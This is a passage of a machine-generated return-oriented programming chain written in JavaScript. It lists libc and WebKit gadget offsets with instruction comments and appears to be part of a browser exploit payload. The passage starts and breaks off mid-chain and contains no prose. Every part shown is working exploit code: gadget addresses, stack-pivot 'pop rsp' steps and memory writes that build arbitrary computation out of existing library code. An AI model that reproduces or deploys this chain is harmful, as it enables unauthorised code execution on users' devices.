//L3786: db([0, 0]); // 0x0 set_gadgets([ ropchain+218384, //L3786+24 ropchain+219096, //L3781 libc_base+764760, //pop rsi ropchain+218424, //L3787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3787: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3789: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+218544, //L3792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+218528, //L3790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3790: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3792: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+218720, //L3795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+218736, //L3796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+218688, //L3793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+218704, //L3794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3793: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3794: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3795: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3796: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+218832, //L3798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+218816, //L3797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3797: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L3798: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+218920, //L3800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3799: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L3800: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+218976, //L3801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3801: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3803: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+219056, //L3805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3805: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L3781: //L3806: libc_base+764760, //pop rsi ropchain+219136, //L3807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3807: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3809: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+219256, //L3812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219240, //L3810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3810: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3812: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+219400, //L3815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219368, //L3813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+219384, //L3814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3813: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3814: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3815: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+219480, //L3816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3816: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3818: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+219600, //L3821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219584, //L3819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3821: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+219776, //L3824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+219792, //L3825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+219744, //L3822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+219760, //L3823 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3822: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3823: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3824: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3825: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+219952, //L3829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+219920, //L3827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+219936, //L3828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3826: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3827: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3828: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3829: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+220040, //L3830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220056, //L3831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3830: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3831: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+220232, //L3833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220248, //L3834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220216, //L3832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3832: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3833: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3834: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+220408, //L3839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+220424, //L3840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+220360, //L3836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3836: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3837: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3838: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3839: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3840: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+220536, //L3841+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+220528, //L3841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3841: db([0, 0]); // 0x0 set_gadgets([ ropchain+220552, //L3841+24 ropchain+221504, //L3835 libc_base+764760, //pop rsi ropchain+220592, //L3842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3842: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3844: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+220712, //L3847 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220696, //L3845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3845: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3847: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+220856, //L3850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+220824, //L3848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+220840, //L3849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3848: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3849: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3850: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+220952, //L3852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3851: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3852: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3853: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+221056, //L3854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221072, //L3855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3854: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3855: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); 
db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+221248, //L3857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221264, //L3858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221232, //L3856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3856: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3857: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3858: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+221408, //L3861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221424, //L3862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+221376, //L3859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3859: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3860: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3861: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3862: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+221496, //L3863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3863: db([0, 0]); // 0x0 //L3835: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+221624, //L3866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
libc_base+764760, //pop rsi ropchain+221640, //L3867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221608, //L3865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3865: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3867: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+221752, //L3869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+221800, //L3872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+221768, //L3870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3869: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3870: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3871: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3872: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+221912, //L3873+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+221904, //L3873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3873: db([0, 0]); // 0x0 set_gadgets([ ropchain+221928, //L3873+24 ropchain+223952, //L3868 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+221968, //L3874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3874: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3875: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L3876: db([48, 0]); // 0x30 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+222160, //L3880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+222128, //L3878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222144, //L3879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3877: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3879: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3880: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+222216, //L3882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3882: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+222344, //L3884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+222360, //L3885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222328, //L3883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3883: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3884: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3885: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+222456, //L3887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+222440, //L3886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3886: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3887: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+222536, //L3888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3888: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3890: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+222656, //L3893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+222640, //L3891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3893: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+222800, //L3896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+222768, //L3894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+222784, //L3895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3894: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3895: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3896: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+222872, //L3898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3898: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+222928, //L3899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L3899: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+223008, //L3901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3901: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3903: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+223128, //L3906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+223112, //L3904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3904: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3906: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223272, //L3909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+223240, //L3907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+223256, //L3908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3907: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3908: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3909: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+223360, //L3911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3910: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3911: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, 
//pop rsi ropchain+223416, //L3912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3912: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3914: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+223496, //L3916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3916: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+223600, //L3917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+223616, //L3918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3917: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3918: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+223704, //L3920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3920: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223760, //L3921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3921: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+223832, //L3924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, 
rcx libc_base+763368 //pop rcx ]); //L3924: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+223888, //L3925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3925: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+223968, //L3927 //L3868: libc_base+782311, //pop rsp ropchain+223984, //L3928 //L3927: libc_base+782311, //pop rsp ropchain+219096, //L3806 //L3928: //L3929: libc_base+764760, //pop rsi ropchain+224024, //L3930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3930: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3932: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+224144, //L3935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+224128, //L3933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3933: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3935: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+224320, //L3938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+224336, //L3939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+224288, //L3936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+224304, //L3937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L3936: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3937: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3938: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3939: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+224432, //L3941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+224416, //L3940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3940: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3941: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3942: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3943: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3944: db([0, 0]); // 0x0 set_gadgets([ 